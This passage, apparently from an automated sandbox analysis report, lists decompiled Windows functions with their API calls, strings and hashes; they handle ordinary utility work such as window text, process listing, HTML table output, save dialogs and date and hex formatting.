				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

 , xrefs: 00407702
<td bgcolor=#%s nowrap>%s, xrefs: 00407649
<td bgcolor=#%s>%s, xrefs: 00407657
<tr>, xrefs: 00407661

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

0, xrefs: 004060AE
6, xrefs: 004060B6

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

cfg, xrefs: 00403717
L, xrefs: 0040378B

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

